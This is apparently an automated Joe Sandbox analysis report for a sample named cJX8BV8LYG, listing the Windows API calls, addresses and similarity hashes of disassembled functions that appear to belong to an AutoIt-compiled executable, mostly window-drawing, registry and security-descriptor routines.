                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2211948467-2373415609
                                    • Opcode ID: 927877c19868a671e8cc55df999dded8e6dc8044b5ae69539ac86dcf80b5d0e6
                                    • Instruction ID: 1a06c01d2f42caecf5d01dc2257e98eb7b366aaa6b435d81f62e123574d1ed09
                                    • Opcode Fuzzy Hash: 927877c19868a671e8cc55df999dded8e6dc8044b5ae69539ac86dcf80b5d0e6
                                    • Instruction Fuzzy Hash: B9024671940209EFDB14DFA4CC89EAE7BB9FF49711F108558F915AB2A1CB78AD01CB60
                                    Function 008170D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 0081712F
                                    • GetSysColorBrush.USER32(0000000F), ref: 00817160
                                    • GetSysColor.USER32(0000000F), ref: 0081716C
                                    • SetBkColor.GDI32(?,000000FF), ref: 00817186
                                    • SelectObject.GDI32(?,?), ref: 00817195
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 008171C0
                                    • GetSysColor.USER32(00000010), ref: 008171C8
                                    • CreateSolidBrush.GDI32(00000000), ref: 008171CF
                                    • FrameRect.USER32(?,?,00000000), ref: 008171DE
                                    • DeleteObject.GDI32(00000000), ref: 008171E5
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00817230
                                    • FillRect.USER32(?,?,?), ref: 00817262
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00817284
                                      • Part of subcall function 008173E8: GetSysColor.USER32(00000012), ref: 00817421
                                      • Part of subcall function 008173E8: SetTextColor.GDI32(?,?), ref: 00817425
                                      • Part of subcall function 008173E8: GetSysColorBrush.USER32(0000000F), ref: 0081743B
                                      • Part of subcall function 008173E8: GetSysColor.USER32(0000000F), ref: 00817446
                                      • Part of subcall function 008173E8: GetSysColor.USER32(00000011), ref: 00817463
                                      • Part of subcall function 008173E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00817471
                                      • Part of subcall function 008173E8: SelectObject.GDI32(?,00000000), ref: 00817482
                                      • Part of subcall function 008173E8: SetBkColor.GDI32(?,00000000), ref: 0081748B
                                      • Part of subcall function 008173E8: SelectObject.GDI32(?,?), ref: 00817498
                                      • Part of subcall function 008173E8: InflateRect.USER32(?,000000FF,000000FF), ref: 008174B7
                                      • Part of subcall function 008173E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008174CE
                                      • Part of subcall function 008173E8: GetWindowLongW.USER32(00000000,000000F0), ref: 008174DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                    • String ID:
                                    • API String ID: 4124339563-0
                                    • Opcode ID: 57aed1131b01429fb72854db83b7966089a328044b13ff420857c8f03300acba
                                    • Instruction ID: f4a451559183902b01b8afebbd675d66fe9646f36a5b30a9cc39e426eebe213c
                                    • Opcode Fuzzy Hash: 57aed1131b01429fb72854db83b7966089a328044b13ff420857c8f03300acba
                                    • Instruction Fuzzy Hash: 3AA17B72048301BFDB019F64DC48AEABBBEFF89320F104A19F966D61A1D771E985CB51
                                    Function 00798D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(?,?), ref: 00798E14
                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 007D6AC5
                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007D6AFE
                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007D6F43
                                      • Part of subcall function 00798F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00798BE8,?,00000000,?,?,?,?,00798BBA,00000000,?), ref: 00798FC5
                                    • SendMessageW.USER32(?,00001053), ref: 007D6F7F
                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007D6F96
                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 007D6FAC
                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 007D6FB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                    • String ID: 0
                                    • API String ID: 2760611726-4108050209
                                    • Opcode ID: 7753165d35504e51a8f11628abfb37d104bf9e0789b46b4f17a083b7c54b1abe
                                    • Instruction ID: 5ee9b477583a8e1af175b4a9ad85f6ec9feab08ed0f1f300bf04ec9eef00901f
                                    • Opcode Fuzzy Hash: 7753165d35504e51a8f11628abfb37d104bf9e0789b46b4f17a083b7c54b1abe
                                    • Instruction Fuzzy Hash: 0312AC70200601EFDB65CF24D858BAABBF5FF49301F54846AF4998B261CB39EC51DB92
                                    Function 00802711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(00000000), ref: 0080273E
                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0080286A
                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 008028A9
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 008028B9
                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00802900
                                    • GetClientRect.USER32(00000000,?), ref: 0080290C
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00802955
                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00802964
                                    • GetStockObject.GDI32(00000011), ref: 00802974
                                    • SelectObject.GDI32(00000000,00000000), ref: 00802978
                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00802988
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00802991
                                    • DeleteDC.GDI32(00000000), ref: 0080299A
                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008029C6
                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 008029DD
                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00802A1D
                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00802A31
                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00802A42
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00802A77
                                    • GetStockObject.GDI32(00000011), ref: 00802A82
                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00802A8D
                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00802A97
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                    • API String ID: 2910397461-517079104
                                    • Opcode ID: 4609d26c5f14a1ca525f4f4749c12b14247ee9fb2ed0a47308b2de795df9785e
                                    • Instruction ID: b038a21cd23851e23355c36c2891664315c797b0a4c12bee858aab11ca6e8ca4
                                    • Opcode Fuzzy Hash: 4609d26c5f14a1ca525f4f4749c12b14247ee9fb2ed0a47308b2de795df9785e
                                    • Instruction Fuzzy Hash: 6DB13A71A40219AFEB14DFA8CC49FAA7BA9FF08715F108514F915E7290D7B8ED40CBA0
                                    Function 007F4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 007F4AED
                                    • GetDriveTypeW.KERNEL32(?,0081CB68,?,\\.\,0081CC08), ref: 007F4BCA
                                    • SetErrorMode.KERNEL32(00000000,0081CB68,?,\\.\,0081CC08), ref: 007F4D36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    • Opcode ID: 9b9cca8495d12fd6105a8377d9e4c43db36fa8b26b85dbf309d320582af9b68d
                                    • Instruction ID: 429df6218edcd0b436e4f4a0bc6caa0f1ec6a1779823f389ff4a087d03baeeed
                                    • Opcode Fuzzy Hash: 9b9cca8495d12fd6105a8377d9e4c43db36fa8b26b85dbf309d320582af9b68d
                                    • Instruction Fuzzy Hash: 1061E13064120DDBCB04DF24C995A7A77B0FB45710B248015FA26EB752EB3EDD51DB62
                                    Function 008173E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 00817421
                                    • SetTextColor.GDI32(?,?), ref: 00817425
                                    • GetSysColorBrush.USER32(0000000F), ref: 0081743B
                                    • GetSysColor.USER32(0000000F), ref: 00817446
                                    • CreateSolidBrush.GDI32(?), ref: 0081744B
                                    • GetSysColor.USER32(00000011), ref: 00817463
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00817471
                                    • SelectObject.GDI32(?,00000000), ref: 00817482
                                    • SetBkColor.GDI32(?,00000000), ref: 0081748B
                                    • SelectObject.GDI32(?,?), ref: 00817498
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 008174B7
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008174CE
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 008174DB
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0081752A
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00817554
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00817572
                                    • DrawFocusRect.USER32(?,?), ref: 0081757D
                                    • GetSysColor.USER32(00000011), ref: 0081758E
                                    • SetTextColor.GDI32(?,00000000), ref: 00817596
                                    • DrawTextW.USER32(?,008170F5,000000FF,?,00000000), ref: 008175A8
                                    • SelectObject.GDI32(?,?), ref: 008175BF
                                    • DeleteObject.GDI32(?), ref: 008175CA
                                    • SelectObject.GDI32(?,?), ref: 008175D0
                                    • DeleteObject.GDI32(?), ref: 008175D5
                                    • SetTextColor.GDI32(?,?), ref: 008175DB
                                    • SetBkColor.GDI32(?,?), ref: 008175E5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    • Opcode ID: 9751f97eb1d37b09c8a59ce8ec1f9208af54a486c0bf97bef6a30480d3687eb7
                                    • Instruction ID: 3d06e68c1b933582329aa52ffe97aebe3a504b1fa407429d4a239d8ffa2080de
                                    • Opcode Fuzzy Hash: 9751f97eb1d37b09c8a59ce8ec1f9208af54a486c0bf97bef6a30480d3687eb7
                                    • Instruction Fuzzy Hash: E5613A76944218BFDF019FA4DC49AEEBFB9FF08320F218115F915AB2A1D7759980CB90
                                    Function 00810FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00811128
                                    • GetDesktopWindow.USER32 ref: 0081113D
                                    • GetWindowRect.USER32(00000000), ref: 00811144
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00811199
                                    • DestroyWindow.USER32(?), ref: 008111B9
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008111ED
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0081120B
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0081121D
                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00811232
                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00811245
                                    • IsWindowVisible.USER32(00000000), ref: 008112A1
                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 008112BC
                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 008112D0
                                    • GetWindowRect.USER32(00000000,?), ref: 008112E8
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 0081130E
                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00811328
                                    • CopyRect.USER32(?,?), ref: 0081133F
                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 008113AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: 51ea247b24774d6c8448c558e48fc22ca1ca8511ade5f19c6ca88cae7cef6016
                                    • Instruction ID: 19af1d008961997e2e53c14796be467db5643934c2182bb776c0f37b64177d46
                                    • Opcode Fuzzy Hash: 51ea247b24774d6c8448c558e48fc22ca1ca8511ade5f19c6ca88cae7cef6016
                                    • Instruction Fuzzy Hash: 40B16F71604341AFDB14DF64C889BAABBE8FF88754F00891CFA99DB2A1C775D844CB51
                                    Function 00798891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00798968
                                    • GetSystemMetrics.USER32(00000007), ref: 00798970
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0079899B
                                    • GetSystemMetrics.USER32(00000008), ref: 007989A3
                                    • GetSystemMetrics.USER32(00000004), ref: 007989C8
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007989E5
                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007989F5
                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00798A28
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00798A3C
                                    • GetClientRect.USER32(00000000,000000FF), ref: 00798A5A
                                    • GetStockObject.GDI32(00000011), ref: 00798A76
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00798A81
                                      • Part of subcall function 0079912D: GetCursorPos.USER32(?), ref: 00799141
                                      • Part of subcall function 0079912D: ScreenToClient.USER32(00000000,?), ref: 0079915E
                                      • Part of subcall function 0079912D: GetAsyncKeyState.USER32(00000001), ref: 00799183
                                      • Part of subcall function 0079912D: GetAsyncKeyState.USER32(00000002), ref: 0079919D
                                    • SetTimer.USER32(00000000,00000000,00000028,007990FC), ref: 00798AA8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: AutoIt v3 GUI
                                    • API String ID: 1458621304-248962490
                                    • Opcode ID: c6ad45a9700b4538b76c0c79f6f033ad24abe6b64702d910bed51dae06fb3024
                                    • Instruction ID: 25dc4ec3f746fa2383c690fb10d5597037b2072ff7df72b9d2705f4b5ee69fbf
                                    • Opcode Fuzzy Hash: c6ad45a9700b4538b76c0c79f6f033ad24abe6b64702d910bed51dae06fb3024
                                    • Instruction Fuzzy Hash: 9FB13B75A402099FDF14DFA8DC49BEA7BB5FB48325F10422AFA15A7290DB78A840CB51
                                    Function 007E0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007E1114
                                      • Part of subcall function 007E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E1120
                                      • Part of subcall function 007E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E112F
                                      • Part of subcall function 007E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E1136
                                      • Part of subcall function 007E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007E114D
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007E0DF5
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007E0E29
                                    • GetLengthSid.ADVAPI32(?), ref: 007E0E40
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 007E0E7A
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007E0E96
                                    • GetLengthSid.ADVAPI32(?), ref: 007E0EAD
                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 007E0EB5
                                    • HeapAlloc.KERNEL32(00000000), ref: 007E0EBC
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007E0EDD
                                    • CopySid.ADVAPI32(00000000), ref: 007E0EE4
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007E0F13
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007E0F35
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007E0F47
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007E0F6E
                                    • HeapFree.KERNEL32(00000000), ref: 007E0F75
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007E0F7E
                                    • HeapFree.KERNEL32(00000000), ref: 007E0F85
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007E0F8E
                                    • HeapFree.KERNEL32(00000000), ref: 007E0F95
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007E0FA1
                                    • HeapFree.KERNEL32(00000000), ref: 007E0FA8
                                      • Part of subcall function 007E1193: GetProcessHeap.KERNEL32(00000008,007E0BB1,?,00000000,?,007E0BB1,?), ref: 007E11A1
                                      • Part of subcall function 007E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,007E0BB1,?), ref: 007E11A8
                                      • Part of subcall function 007E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,007E0BB1,?), ref: 007E11B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                    • String ID:
                                    • API String ID: 4175595110-0
                                    • Opcode ID: f573da656c9ceb0933d91c4124d01dd407dfde96d860c3aa5a4c1bf8c43a3297
                                    • Instruction ID: ce454783c9134eb21af9b5ddd889682236157b0e50afdbc349362d6dd3b10863
                                    • Opcode Fuzzy Hash: f573da656c9ceb0933d91c4124d01dd407dfde96d860c3aa5a4c1bf8c43a3297
                                    • Instruction Fuzzy Hash: 6D717A7294124AEBDB209FA5DC48BEEBBBCBF08300F048125F959E6191D7749E55CBA0
                                    Function 0080C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0080C4BD
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0081CC08,00000000,?,00000000,?,?), ref: 0080C544
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0080C5A4
                                    • _wcslen.LIBCMT ref: 0080C5F4
                                    • _wcslen.LIBCMT ref: 0080C66F
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0080C6B2
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0080C7C1
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0080C84D
                                    • RegCloseKey.ADVAPI32(?), ref: 0080C881
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0080C88E
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0080C960
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 9721498-966354055
                                    • Opcode ID: b45a5000bb0a22a7f140c94c4610bbbad37b5f25b8670d7d62b18dea6a6905ae
                                    • Instruction ID: 816489da2f7a18c58898366814d2891d2e5be59cce81d7180905f87b751df518
                                    • Opcode Fuzzy Hash: b45a5000bb0a22a7f140c94c4610bbbad37b5f25b8670d7d62b18dea6a6905ae
                                    • Instruction Fuzzy Hash: 61126835204201DFDB14EF14C885A2AB7E5FF88714F18899CF89A9B3A2DB35ED41CB95
                                    Function 0081091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 008109C6
                                    • _wcslen.LIBCMT ref: 00810A01
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00810A54
                                    • _wcslen.LIBCMT ref: 00810A8A
                                    • _wcslen.LIBCMT ref: 00810B06
                                    • _wcslen.LIBCMT ref: 00810B81
                                      • Part of subcall function 0079F9F2: _wcslen.LIBCMT ref: 0079F9FD
                                      • Part of subcall function 007E2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007E2BFA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
